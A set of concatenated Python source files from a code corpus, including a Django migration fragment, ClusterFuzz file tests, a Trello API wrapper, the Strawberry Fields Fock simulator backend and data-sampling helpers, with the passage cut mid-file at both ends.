'blank': 'True'}), 'stub': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}), 'stuff_ive_done': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'things_im_good_at': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}), 'what_i_do': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}) }, 'staff_directory.praise': { 'Meta': {'object_name': 'Praise'}, 'cfpb_value': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'praise_nominator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'reason': ('django.db.models.fields.TextField', [], {}), 'recipient': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Person']"}) }, 'taggit.tag': { 'Meta': {'object_name': 'Tag'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '150'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}) }, 'taggit.category': { 'Meta': {'object_name': 'TagCategory'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}) }, 'taggit.taggeditem': { 'Meta': {'object_name': 'TaggedItem'}, 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}), 'create_timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}), 'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"}), 'tag_category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['taggit.TagCategory']", 'null': 'True'}), 'tag_creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_related'", 'null': 'True', 'to': "orm['auth.User']"}) } } complete_apps = ['staff_directory']
StarcoderdataPython
3238385
<filename>src/clusterfuzz/_internal/tests/core/bot/untrusted_runner/file_impl_test.py # Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for remote_process.""" import os import mock from pyfakefs import fake_filesystem_unittest from clusterfuzz._internal.bot.untrusted_runner import config from clusterfuzz._internal.bot.untrusted_runner import file_impl from clusterfuzz._internal.protos import untrusted_runner_pb2 from clusterfuzz._internal.tests.test_libs import test_utils class FileImplTest(fake_filesystem_unittest.TestCase): """FileImpl tests.""" def setUp(self): test_utils.set_up_pyfakefs(self) def test_create_directory(self): """Test file_impl.create_directory.""" request = untrusted_runner_pb2.CreateDirectoryRequest( path='/dir', create_intermediates=False) response = file_impl.create_directory(request, None) self.assertTrue(response.result) self.assertTrue(os.path.isdir('/dir')) request = untrusted_runner_pb2.CreateDirectoryRequest( path='/dir2/dir2', create_intermediates=False) response = file_impl.create_directory(request, None) self.assertFalse(response.result) self.assertFalse(os.path.isdir('/dir2/dir2')) request = untrusted_runner_pb2.CreateDirectoryRequest( path='/dir3/dir3', create_intermediates=True) response = file_impl.create_directory(request, None) self.assertTrue(response.result) self.assertTrue(os.path.isdir('/dir3/dir3')) def test_remove_directory(self): """Test file_impl.remove_directory.""" os.mkdir('/dir') request = untrusted_runner_pb2.RemoveDirectoryRequest( path='/dir', recreate=False) response = file_impl.remove_directory(request, None) self.assertTrue(response.result) self.assertFalse(os.path.isdir('/dir')) os.mkdir('/dir') request = untrusted_runner_pb2.RemoveDirectoryRequest( path='/dir', recreate=True) response = file_impl.remove_directory(request, None) self.assertTrue(response.result) self.assertTrue(os.path.isdir('/dir')) def test_copy_file_to_worker(self): """Test file_impl.copy_file_to_worker.""" request_iterator = ( untrusted_runner_pb2.FileChunk(data=b'A'), untrusted_runner_pb2.FileChunk(data=b'B'), untrusted_runner_pb2.FileChunk(data=b'C'), ) context = mock.MagicMock() context.invocation_metadata.return_value = (('path-bin', b'/file'),) response = file_impl.copy_file_to_worker(request_iterator, context) self.assertTrue(response.result) self.assertTrue(os.path.exists('/file')) with open('/file') as f: self.assertEqual('ABC', f.read()) def test_stat(self): """Test file_impl.stat.""" self.fs.create_file('/file') request = untrusted_runner_pb2.StatRequest(path='/file') response = file_impl.stat(request, None) expected = os.stat('/file') self.assertTrue(response.result) self.assertEqual(expected.st_mode, response.st_mode) self.assertEqual(expected.st_size, response.st_size) self.assertEqual(expected.st_atime, response.st_atime) self.assertEqual(expected.st_ctime, response.st_ctime) self.assertEqual(expected.st_mtime, response.st_mtime) def test_stat_does_not_exist(self): """Test file_impl.stat (does not exist).""" request = untrusted_runner_pb2.StatRequest(path='/file') response = file_impl.stat(request, None) self.assertFalse(response.result) def test_copy_file_to_worker_create_intermediate(self): """Test file_impl.copy_file_to_worker (create intermediates).""" request_iterator = ( untrusted_runner_pb2.FileChunk(data=b'A'), untrusted_runner_pb2.FileChunk(data=b'B'), untrusted_runner_pb2.FileChunk(data=b'C'), ) context = mock.MagicMock() context.invocation_metadata.return_value = (('path-bin', b'/new_dir/file'),) response = file_impl.copy_file_to_worker(request_iterator, context) self.assertTrue(response.result) self.assertTrue(os.path.exists('/new_dir/file')) with open('/new_dir/file') as f: self.assertEqual('ABC', f.read()) def test_copy_file_to_worker_create_dir_is_a_file(self): """Test file_impl.copy_file_to_worker when the directory is an existing file.""" request_iterator = ( untrusted_runner_pb2.FileChunk(data=b'A'), untrusted_runner_pb2.FileChunk(data=b'B'), untrusted_runner_pb2.FileChunk(data=b'C'), ) self.fs.create_file('/file') context = mock.MagicMock() context.invocation_metadata.return_value = (('path-bin', b'/file/file'),) response = file_impl.copy_file_to_worker(request_iterator, context) self.assertFalse(response.result) self.assertTrue(os.path.isfile('/file')) def test_copy_file_to_worker_create_dir_error(self): """Test file_impl.copy_file_to_worker when we fail to create intermediate dirs.""" request_iterator = ( untrusted_runner_pb2.FileChunk(data=b'A'), untrusted_runner_pb2.FileChunk(data=b'B'), untrusted_runner_pb2.FileChunk(data=b'C'), ) self.fs.create_file('/file') context = mock.MagicMock() context.invocation_metadata.return_value = (('path-bin', b'/file/dir/file'),) response = file_impl.copy_file_to_worker(request_iterator, context) self.assertFalse(response.result) self.assertTrue(os.path.isfile('/file')) def test_copy_file_from_worker(self): """Test file_impl.copy_file_from_worker.""" contents = (b'A' * config.FILE_TRANSFER_CHUNK_SIZE + b'B' * config.FILE_TRANSFER_CHUNK_SIZE + b'C' * config.FILE_TRANSFER_CHUNK_SIZE) self.fs.create_file('/file', contents=contents) request = untrusted_runner_pb2.CopyFileFromRequest(path='/file') context = mock.MagicMock() response = file_impl.copy_file_from_worker(request, context) chunks = [chunk.data for chunk in response] self.assertEqual(len(chunks), 3) self.assertEqual(contents, b''.join(chunks)) context.set_trailing_metadata.assert_called_with([('result', 'ok')]) def test_copy_file_from_worker_failed(self): """Test file_impl.copy_file_from_worker.""" request = untrusted_runner_pb2.CopyFileFromRequest(path='/file') context = mock.MagicMock() response = file_impl.copy_file_from_worker(request, context) self.assertEqual(0, len(list(response))) context.set_trailing_metadata.assert_called_with([('result', 'invalid-path')])
StarcoderdataPython
151647
# This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this open-source project. """ Define the functions to load data. """ import os import json import argparse import numpy as np def load_data(data_dir, interval=100, data_type='2D'): music_data, dance_data = [], [] fnames = sorted(os.listdir(data_dir)) # fnames = fnames[:10] # For debug for fname in fnames: path = os.path.join(data_dir, fname) with open(path) as f: sample_dict = json.loads(f.read()) np_music = np.array(sample_dict['music_array']) np_dance = np.array(sample_dict['dance_array']) if data_type == '2D': # Only use 25 keypoints skeleton (basic bone) for 2D np_dance = np_dance[:, :50] root = np_dance[:, 2*8:2*9] np_dance = np_dance - np.tile(root, (1, 25)) np_dance[:, 2*8:2*9] = root seq_len, dim = np_music.shape for i in range(0, seq_len, interval): music_sub_seq = np_music[i: i + interval] dance_sub_seq = np_dance[i: i + interval] if len(music_sub_seq) == interval: music_data.append(music_sub_seq) dance_data.append(dance_sub_seq) return music_data, dance_data def load_test_data(data_dir, data_type='2D'): music_data, dance_data = [], [] fnames = sorted(os.listdir(data_dir)) print(fnames) # fnames = fnames[:60] # For debug for fname in fnames: path = os.path.join(data_dir, fname) with open(path) as f: sample_dict = json.loads(f.read()) np_music = np.array(sample_dict['music_array']) np_dance = np.array(sample_dict['dance_array']) if data_type == '2D': # Only use 25 keypoints skeleton (basic bone) for 2D np_dance = np_dance[:, :50] root = np_dance[:, 2*8:2*9] np_dance = np_dance - np.tile(root, (1, 25)) np_dance[:, 2*8:2*9] = root music_data.append(np_music) dance_data.append(np_dance) return music_data, dance_data, fnames def load_json_data(data_file, max_seq_len=150): music_data = [] dance_data = [] count = 0 total_count = 0 with open(data_file) as f: data_list = json.loads(f.read()) for data in data_list: # The first and last segment may be unusable music_segs = data['music_segments'] dance_segs = data['dance_segments'] assert len(music_segs) == len(dance_segs), 'alignment' for i in range(len(music_segs)): total_count += 1 if len(music_segs[i]) > max_seq_len: count += 1 continue music_data.append(music_segs[i]) dance_data.append(dance_segs[i]) rate = count / total_count print(f'total num of segments: {total_count}') print(f'num of segments length > {max_seq_len}: {count}') print(f'the rate: {rate}') return music_data, dance_data def str2bool(v): if v.lower() in ('yes', 'true', 't', 'y', '1'): return True elif v.lower() in ('no', 'false', 'f', 'n', '0'): return False else: raise argparse.ArgumentTypeError('Boolean value expected.')
StarcoderdataPython
136831
import json import requests class Actions(object): __module__ = 'trello' def __init__(self, apikey, token=None): self._apikey = apikey self._token = token def get(self, idAction, display=None, entities=None, fields=None, member=None, member_fields=None, memberCreator=None, memberCreator_fields=None): resp = requests.get("https://trello.com/1/actions/{}".format(idAction), params={"key": self._apikey, "token": self._token, "display": display, "entities": entities, "fields": fields, "member": member, "member_fields": member_fields, "memberCreator": memberCreator, "memberCreator_fields": memberCreator_fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_board(self, idAction, fields=None): resp = requests.get("https://trello.com/1/actions/{}/board".format(idAction), params={"key": self._apikey, "token": self._token, "fields": fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_board_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/board/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_card(self, idAction, fields=None): resp = requests.get("https://trello.com/1/actions/{}/card".format(idAction), params={"key": self._apikey, "token": self._token, "fields": fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_card_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/card/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_display(self, idAction): resp = requests.get("https://trello.com/1/actions/{}/display".format(idAction), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_entitie(self, idAction): resp = requests.get("https://trello.com/1/actions/{}/entities".format(idAction), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_list(self, idAction, fields=None): resp = requests.get("https://trello.com/1/actions/{}/list".format(idAction), params={"key": self._apikey, "token": self._token, "fields": fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_list_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/list/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_member(self, idAction, fields=None): resp = requests.get("https://trello.com/1/actions/{}/member".format(idAction), params={"key": self._apikey, "token": self._token, "fields": fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_member_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/member/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_memberCreator(self, idAction, fields=None): resp = requests.get("https://trello.com/1/actions/{}/memberCreator".format(idAction), params={"key": self._apikey, "token": self._token, "fields": fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_memberCreator_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/memberCreator/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_organization(self, idAction, fields=None): resp = requests.get("https://trello.com/1/actions/{}/organization".format(idAction), params={"key": self._apikey, "token": self._token, "fields": fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_organization_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/organization/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def update(self, idAction, text=None): resp = requests.put("https://trello.com/1/actions/{}".format(idAction), params={"key": self._apikey, "token": self._token}, data={"text": text}) resp.raise_for_status() return json.loads(resp.text) def update_text(self, idAction, value): resp = requests.put("https://trello.com/1/actions/{}/text".format(idAction), params={"key": self._apikey, "token": self._token}, data={"value": value}) resp.raise_for_status() return json.loads(resp.text) def delete(self, idAction): resp = requests.delete("https://trello.com/1/actions/{}".format(idAction), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text)
StarcoderdataPython
166178
servo_a_pw = [[-90.0, 2463] [-86.4, 2423] [-72.0, 2263] [-56.6, 2093] [-43.2, 2013] [-28.8, 1793] [-14.4, 1646] [0.0, 1436] [14.4, 1276] [28.8, 1096] [43.2, 916] [56.6, 746] [72.0, 586] [72.0, 590] [90.0, 390]]
StarcoderdataPython
3266469
<reponame>JKamlah/ocromore<filename>test_code/test_pytesseract.py # ! /usr/bin/python3.6 # -*- coding: utf-8 -*- """ This is a script for testing different python3.6/python features and basic functionality, just to learn python from scratch and by doing. I intend to stick to the PEP-8 coding guidelines. """ import os try: import Image except ImportError: from PIL import Image import pytesseract pytesseract.pytesseract.tesseract_cmd = '/usr/local/bin/tesseract' # TESSERACT_CONFIG # psm 11 Sparse text. Find as much text as possible in no particular order # => just for testing (3 is default) TESSERACT_CONFIG = \ '--oem 3 \ --psm 11 \ --tessdata-dir "/home/johannes/Repos/tesseract/tessdata/tessdata_fast"' IMAGE_PATH = '/media/sf_firmprofiles/many_years_firmprofiles/short/oneprof' FILENAME = 'oneprof.jpg' filepath = os.path.join(IMAGE_PATH, FILENAME) image = Image.open(filepath) # text = pytesseract.image_to_string(image) print(pytesseract.__doc__) text = pytesseract.image_to_string( image, lang='deu', config=TESSERACT_CONFIG ) print("Converted image at", filepath, " to text: ", text)
StarcoderdataPython
56969
<filename>strawberryfields/backends/fockbackend/circuit.py # Copyright 2018 Xanadu Quantum Technologies Inc. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fock backend proper ====================== Contains most of the code for managing the simulator state and offloading operations to the utilities in ops. Hyperlinks: :class:`QReg` .. currentmodule:: strawberryfields.backends.fockbackend.circuit Contents ---------------------- .. autosummary:: QReg """ # pylint: disable=too-many-arguments,len-as-condition,attribute-defined-outside-init # pylint: disable=too-many-branches,too-many-locals,too-many-public-methods import copy import string import numbers from itertools import product import numpy as np from numpy import sqrt, pi from scipy.special import factorial as bang from . import ops indices = string.ascii_lowercase MAX_MODES = len(indices) - 3 def_mode = 'blas' class QReg(): """ Class implementing a basic simulator for a collection of modes in the fock basis. """ def __init__(self, num, trunc, hbar=2, pure=True, do_checks=False, mode=def_mode): r"""Class initializer. Args: num (non-negative int): Number of modes in the register. trunc (positive int): Truncation parameter. Modes with up to trunc-1 modes are representable hbar (int): The value of :math:`\hbar` to initialise the circuit with, depending on the conventions followed. By default, :math:`\hbar=2`. See :ref:`conventions` for more details. pure (bool, optional): Whether states are pure (True) or mixed (False) do_checks (bool, optional): Whether arguments are to be checked first """ # Check validity if num < 0: raise ValueError("Number of modes must be non-negative -- got {}".format(num)) elif num > MAX_MODES: raise ValueError("Fock simulator has a maximum of {} modes".format(MAX_MODES)) elif trunc <= 0: raise ValueError("Truncation must be positive -- got {}".format(trunc)) self._num_modes = num self._trunc = trunc self._hbar = hbar self._checks = do_checks self._pure = pure self._mode = mode self.reset(None) def _apply_gate(self, mat, modes): """Master gate application function. Selects between implementations based on the `_mode` class parameter. Args: mat (array): The matrix to apply modes (list<non-negative int>): The modes to apply `mat` to """ args = [mat, self._state, self._pure, modes, self._num_modes, self._trunc] if self._mode == 'blas': self._state = ops.apply_gate_BLAS(*args) elif self._mode == 'einsum': self._state = ops.apply_gate_einsum(*args) else: raise NotImplementedError def _apply_channel(self, kraus_ops, modes): """Master channel application function. Applies a channel represented by Kraus operators. .. note:: Always results in a mixed state. Args: kraus_ops (list<array>): A list of Kraus operators modes (list<non-negative int>): The modes to apply the channel to """ if self._pure: self._state = ops.mix(self._state, self._num_modes) self._pure = False if len(kraus_ops) == 0: self._state = np.zeros([self._trunc for i in range(self._num_modes*2)], dtype=ops.def_type) elif self._mode == 'blas': states = [ops.apply_gate_einsum(k, np.copy(self._state), False, modes, self._num_modes, self._trunc)\ for k in kraus_ops] self._state = sum(states) elif self._mode == 'einsum': states = [ops.apply_gate_einsum(k, self._state, False, modes, self._num_modes, self._trunc)\ for k in kraus_ops] self._state = sum(states) def reset(self, pure=None, num_subsystems=None): """Resets the simulation state. Args: pure (bool, optional): Sets the purity setting. Default is unchanged. num_subsystems (int, optional): Sets the number of modes in the reset circuit. Default is unchanged. """ if pure is not None: self._pure = pure if num_subsystems is not None: self._num_modes = num_subsystems if self._pure: self._state = ops.vacuumState(self._num_modes, self._trunc) else: self._state = ops.vacuumStateMixed(self._num_modes, self._trunc) def norm(self): """returns the norm of the state""" if self._pure: return sqrt(np.vdot(self._state, self._state).real) return ops.trace(self._state, self._num_modes) def alloc(self, n=1): """allocate a number of modes at the end of the state.""" # base_shape = [self._trunc for i in range(n)] if self._pure: vac = ops.vacuumState(n, self._trunc) else: vac = ops.vacuumStateMixed(n, self._trunc) self._state = ops.tensor(self._state, vac, self._num_modes, self._pure) self._num_modes = self._num_modes + n def dealloc(self, modes): """Traces out and deallocates the modes in `modes`""" if self._pure: self._state = ops.mix(self._state, self._num_modes) self._pure = False self._state = ops.partial_trace(self._state, self._num_modes, modes) self._num_modes = self._num_modes - len(modes) def prepare(self, state, mode): r""" Prepares a given mode in a given state. Assumes the state of the entire system is of the form :math:`\ket{0}\otimes\ket{\psi}`, up to mode permutations. In particular, the mode may retain any previous phase shift. Args: state (array or matrix): The new state in the fock basis mode (non-negative int): The overwritten mode """ # Do consistency checks pure_shape = (self._trunc,) # mixed_shape = (self._trunc, self._trunc) if self._checks: if (self._pure and state.shape != (self._trunc,)) or \ (not (self._pure) and state.shape != (self._trunc, self._trunc)): raise ValueError("Incorrect shape for state preparation") if self._num_modes == 1: # Hack for marginally faster state preparation self._state = state.astype(ops.def_type) self._pure = bool(state.shape == pure_shape) else: if self._pure: self._state = ops.mix(self._state, self._num_modes) self._pure = False if state.shape != (self._trunc, self._trunc): state = np.outer(state, state.conj()) # Take the partial trace reduced_state = ops.partial_trace(self._state, self._num_modes, [mode]) # Insert state self._state = ops.tensor(reduced_state, state, self._num_modes-1, self._pure, pos=mode) def prepare_mode_fock(self, n, mode): """ Prepares a mode in a fock state. """ if self._pure: self.prepare(ops.fockState(n, self._trunc), mode) else: st = ops.fockState(n, self._trunc) self.prepare(np.outer(st, st.conjugate()), mode) def prepare_mode_coherent(self, alpha, mode): """ Prepares a mode in a coherent state. """ if self._pure: self.prepare(ops.coherentState(alpha, self._trunc), mode) else: st = ops.coherentState(alpha, self._trunc) self.prepare(np.outer(st, st.conjugate()), mode) def prepare_mode_squeezed(self, r, theta, mode): """ Prepares a mode in a squeezed state. """ if self._pure: self.prepare(ops.squeezedState(r, theta, self._trunc), mode) else: st = ops.squeezedState(r, theta, self._trunc) self.prepare(np.outer(st, st.conjugate()), mode) def prepare_mode_displaced_squeezed(self, alpha, r, phi, mode): """ Prepares a mode in a displaced squeezed state. """ if self._pure: self.prepare(ops.displacedSqueezed(alpha, r, phi, self._trunc), mode) else: st = ops.displacedSqueezed(alpha, r, phi, self._trunc) self.prepare(np.outer(st, st.conjugate()), mode) def prepare_mode_thermal(self, nbar, mode): """ Prepares a mode in a thermal state. """ st = ops.thermalState(nbar, self._trunc) self.prepare(st, mode) def phase_shift(self, theta, mode): """ Applies a phase shifter. """ self._apply_gate(ops.phase(theta, self._trunc), [mode]) def displacement(self, alpha, mode): """ Applies a displacement gate. """ self._apply_gate(ops.displacement(alpha, self._trunc), [mode]) def beamsplitter(self, t, r, phi, mode1, mode2): """ Applies a beamsplitter. """ self._apply_gate(ops.beamsplitter(t, r, phi, self._trunc), [mode1, mode2]) def squeeze(self, r, theta, mode): """ Applies a squeezing gate. """ self._apply_gate(ops.squeezing(r, theta, self._trunc), [mode]) def kerr_interaction(self, kappa, mode): """ Applies a Kerr interaction gate. """ self._apply_gate(ops.kerr(kappa, self._trunc), [mode]) def cubic_phase_shift(self, gamma, mode): """ Applies a cubic phase shift gate. """ self._apply_gate(ops.cubicPhase(gamma, self._hbar, self._trunc), [mode]) def is_vacuum(self, tol): """ Tests whether the system is in the vacuum state. """ # base_shape = [self._trunc for i in range(self._num_modes)] if self._pure: vac = ops.vacuumState(self._num_modes, self._trunc) else: vac = ops.vacuumStateMixed(self._num_modes, self._trunc) return np.linalg.norm((self._state - vac).ravel()) < tol def get_state(self): """ Returns the state of the system in the fock basis along with its purity. """ return self._state, self._pure def loss(self, T, mode): """ Applies a loss channel to the state. """ self._apply_channel(ops.lossChannel(T, self._trunc), [mode]) def measure_fock(self, modes, select=None): """ Measures a list of modes. """ # pylint: disable=singleton-comparison if select is not None and np.any(np.array(select) == None): raise NotImplementedError("Post-selection lists must only contain numerical values.") # Make sure the state is mixed if self._pure: state = ops.mix(self._state, self._num_modes) else: state = self._state if select is not None: # perform post-selection # make sure modes and select are the same length if len(select) != len(modes): raise ValueError("When performing post-selection, the number of " "selected values (including None) must match the number of measured modes") # make sure the select values are all integers or nones if not all(isinstance(s, int) or s is None for s in select): raise TypeError("The post-select list elements either be integers or None") # modes to measure measure = [i for i, s in zip(modes, select) if s is None] # modes already post-selected: selected = [i for i, s in zip(modes, select) if s is not None] select_values = [s for s in select if s is not None] # project out postselected modes self._state = ops.project_reset(selected, select_values, self._state, self._pure, self._num_modes, self._trunc) if self.norm() == 0: raise ZeroDivisionError("Measurement has zero probability.") self._state = self._state / self.norm() else: # no post-selection; modes to measure are the modes provided measure = modes if len(measure) > 0: # sampling needs to be performed # Compute distribution by tracing out modes not measured, then computing the diagonal unmeasured = [i for i in range(self._num_modes) if i not in measure] reduced = ops.partial_trace(state, self._num_modes, unmeasured) dist = np.ravel(ops.diagonal(reduced, len(measure)).real) # Make a random choice if sum(dist) != 1: # WARNING: distribution is not normalized, could hide errors i = np.random.choice(list(range(len(dist))), p=dist / sum(dist)) else: i = np.random.choice(list(range(len(dist))), p=dist) permuted_outcome = ops.unIndex(i, len(measure), self._trunc) # Permute the outcome to match the order of the modes in 'measure' permutation = np.argsort(measure) outcome = [0] * len(measure) for i in range(len(measure)): outcome[permutation[i]] = permuted_outcome[i] # Project the state onto the measurement outcome & reset in vacuum self._state = ops.project_reset(measure, outcome, self._state, self._pure, self._num_modes, self._trunc) if self.norm() == 0: raise ZeroDivisionError("Measurement has zero probability.") self._state = self._state / self.norm() # include post-selected values in measurement outcomes if select is not None: outcome = copy.copy(select) return outcome def measure_homodyne(self, phi, mode, select=None, **kwargs): """ Performs a homodyne measurement on a mode. """ m_omega_over_hbar = 1/self._hbar # Make sure the state is mixed for reduced density matrix if self._pure: state = ops.mix(self._state, self._num_modes) else: state = self._state if select is not None: meas_result = select if isinstance(meas_result, numbers.Number): homodyne_sample = float(meas_result) else: raise TypeError("Selected measurement result must be of numeric type.") else: # Compute reduced density matrix unmeasured = [i for i in range(self._num_modes) if not i == mode] reduced = ops.partial_trace(state, self._num_modes, unmeasured) # Rotate to measurement basis args = [ops.phase(-phi, self._trunc), reduced, False, [0], 1, self._trunc] if self._mode == 'blas': reduced = ops.apply_gate_BLAS(*args) elif self._mode == 'einsum': reduced = ops.apply_gate_einsum(*args) # Create pdf. Same as tf implementation, but using # the recursive relation H_0(x) = 1, H_1(x) = 2x, H_{n+1}(x) = 2xH_n(x) - 2nH_{n-1}(x) if "max" in kwargs: q_mag = kwargs["max"] else: q_mag = 10 if "num_bins" in kwargs: num_bins = kwargs["num_bins"] else: num_bins = 100000 q_tensor, Hvals = ops.hermiteVals(q_mag, num_bins, m_omega_over_hbar, self._trunc) H_matrix = np.zeros((self._trunc, self._trunc, num_bins)) for n, m in product(range(self._trunc), repeat=2): H_matrix[n][m] = 1 / sqrt(2**n * bang(n) * 2**m * bang(m)) * Hvals[n] * Hvals[m] H_terms = np.expand_dims(reduced, -1) * np.expand_dims(H_matrix, 0) rho_dist = np.sum(H_terms, axis=(1, 2)) \ * (m_omega_over_hbar/pi)**0.5 \ * np.exp(-m_omega_over_hbar * q_tensor**2) \ * (q_tensor[1] - q_tensor[0]) # Delta_q for normalization (only works if the bins are equally spaced) # Sample from rho_dist. This is a bit different from tensorflow due to how # numpy treats multinomial sampling. In particular, numpy returns a # histogram of the samples whereas tensorflow gives the list of samples. # Numpy also does not use the log probabilities probs = rho_dist.flatten().real probs /= np.sum(probs) sample_hist = np.random.multinomial(1, probs) sample_idx = list(sample_hist).index(1) homodyne_sample = q_tensor[sample_idx] # Project remaining modes into the conditional state inf_squeezed_vac = \ np.array([(-0.5)**(n//2) * sqrt(bang(n)) / bang(n//2) if n%2 == 0 else 0.0 + 0.0j \ for n in range(self._trunc)], dtype=ops.def_type) alpha = homodyne_sample * sqrt(m_omega_over_hbar / 2) composed = np.dot(ops.phase(phi, self._trunc), ops.displacement(alpha, self._trunc)) args = [composed, inf_squeezed_vac, True, [0], 1, self._trunc] if self._mode == 'blas': eigenstate = ops.apply_gate_BLAS(*args) elif self._mode == 'einsum': eigenstate = ops.apply_gate_einsum(*args) vac_state = np.array([1.0 + 0.0j if i == 0 else 0.0 + 0.0j for i in range(self._trunc)], dtype=ops.def_type) projector = np.outer(vac_state, eigenstate.conj()) self._apply_gate(projector, [mode]) # Normalize self._state = self._state / self.norm() return homodyne_sample
StarcoderdataPython
3233697
import numpy as np import torch import random def find_index(y_traj, y_rand): for idx, label in enumerate(y_rand[0]): if label == y_traj[0]: return idx def sample_balanced_data(cactus_partition): for idx, cluster in enumerate(list(cactus_partition.values())): # Sample fixed elements after clustering --> balanced dataset random_samples_number = min(20, len(cluster)) cluster = sorted(random.sample(cluster, random_samples_number)) cactus_partition[idx] = cluster return cactus_partition def sample_random_data(cactus_partition): for idx, cluster in enumerate(list(cactus_partition.values())): # Sample random data from mini-Imagenet after clustering min_len = 10 max_len = 30 random_samples_number = random.randint(min_len, min(max_len, len(cluster))) cluster = sorted(random.sample(cluster, random_samples_number)) cactus_partition[idx] = cluster return cactus_partition def sample_unbalanced_data(cactus_partition): lens = np.asarray([len(el) for el in cactus_partition.values()]) min, max = lens.min(), lens.max() new_min, new_max = 10, 30 new_lens = [] for cluster in cactus_partition.values(): new_cluster_len = int((((new_max - new_min) * (len(cluster) - min)) / (max - min)) + new_min) new_lens.append(new_cluster_len) for idx, cluster_len in enumerate(new_lens): cactus_partition[idx] = sorted(random.sample(cactus_partition[idx], cluster_len)) return cactus_partition def sample_reducted_dataset(data, labels, num_classes): # Sample fixed random data from mini-Imagenet before clustering sample_elements = 20 data = np.array_split(data, num_classes) labels = np.concatenate(np.asarray(np.split(labels, num_classes))[:, :sample_elements]) new_classes = [] for i, cls in enumerate(data): indices = np.random.choice(cls.shape[0], sample_elements, replace=False) new_cls = [] for idx in indices: new_cls.append(cls[idx]) new_classes.append(np.stack((new_cls))) new_classes = np.concatenate(new_classes) return new_classes, labels def compute_weigth_vector(cactus_partition): min_len = 1000 max_len = 0 for el in cactus_partition.items(): if len(el[1]) >= max_len: max_len = len(el[1]) if len(el[1]) < min_len: min_len = len(el[1]) max_key = max(cactus_partition.keys()) empty = dict.fromkeys(range(max_key + 1), []) cactus_partition = {**empty, **cactus_partition} balance_vector = [] for idx, el in enumerate(sorted(cactus_partition.items())): if len(el[1]) != min_len: balance_vector.append((max_len - min_len) / (len(el[1]) - min_len)) elif len(el[1]) == 0: balance_vector.append(0) else: balance_vector.append((max_len - min_len) / ((len(el[1]) + 1) - min_len)) balance_vector = 